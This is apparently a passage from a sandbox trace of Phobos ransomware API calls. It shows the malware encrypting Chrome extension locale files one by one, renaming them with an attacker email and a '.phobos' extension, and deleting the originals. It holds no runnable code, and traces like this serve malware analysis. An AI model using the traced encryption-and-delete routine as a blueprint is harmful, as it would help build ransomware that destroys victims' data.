lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.192] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.193] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0158.193] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.193] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x282, lpOverlapped=0x0) returned 1 [0158.205] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290, dwBufLen=0x290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x290) returned 1 [0158.205] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x290, lpOverlapped=0x0) returned 1 [0158.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0158.206] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.206] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0158.206] CryptDestroyKey (hKey=0xa32de8) returned 1 [0158.206] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0158.206] CryptDestroyKey (hKey=0xa327e8) returned 1 [0158.206] CloseHandle (hObject=0x138) returned 1 [0158.206] CloseHandle (hObject=0x194) returned 1 [0158.206] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json")) returned 1 [0158.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0158.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.208] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=667) returned 1 [0158.209] CloseHandle (hObject=0x194) returned 1 [0158.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0158.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.209] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.209] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0158.210] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.210] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29b, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0158.481] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0158.540] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0158.540] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.540] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0158.540] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0158.540] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0158.540] CryptDestroyKey (hKey=0xa327e8) returned 1 [0158.540] CloseHandle (hObject=0x194) returned 1 [0158.540] CloseHandle (hObject=0x138) returned 1 [0158.540] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json")) returned 1 [0158.541] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0158.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.542] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=661) returned 1 [0158.542] CloseHandle (hObject=0x138) returned 1 [0158.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0158.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.543] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.543] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.543] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0158.543] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.543] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x295, lpOverlapped=0x0) returned 1 [0158.603] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0158.603] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0158.604] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0158.604] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.604] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0158.604] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0158.604] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0158.604] CryptDestroyKey (hKey=0xa327e8) returned 1 [0158.604] CloseHandle (hObject=0x138) returned 1 [0158.604] CloseHandle (hObject=0x194) returned 1 [0158.605] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json")) returned 1 [0158.605] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0158.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.606] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=668) returned 1 [0158.606] CloseHandle (hObject=0x194) returned 1 [0158.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json")) returned 0x2020 [0158.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.606] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.606] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0158.607] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.607] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29c, lpOverlapped=0x0) returned 1 [0158.662] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0158.662] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0159.196] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0159.196] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0159.196] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.196] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0159.196] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.196] CloseHandle (hObject=0x194) returned 1 [0159.197] CloseHandle (hObject=0x138) returned 1 [0159.197] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json")) returned 1 [0159.197] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0159.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.198] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=671) returned 1 [0159.198] CloseHandle (hObject=0x138) returned 1 [0159.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json")) returned 0x2020 [0159.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.198] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.198] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0159.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0159.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0159.199] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29f, lpOverlapped=0x0) returned 1 [0159.205] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, 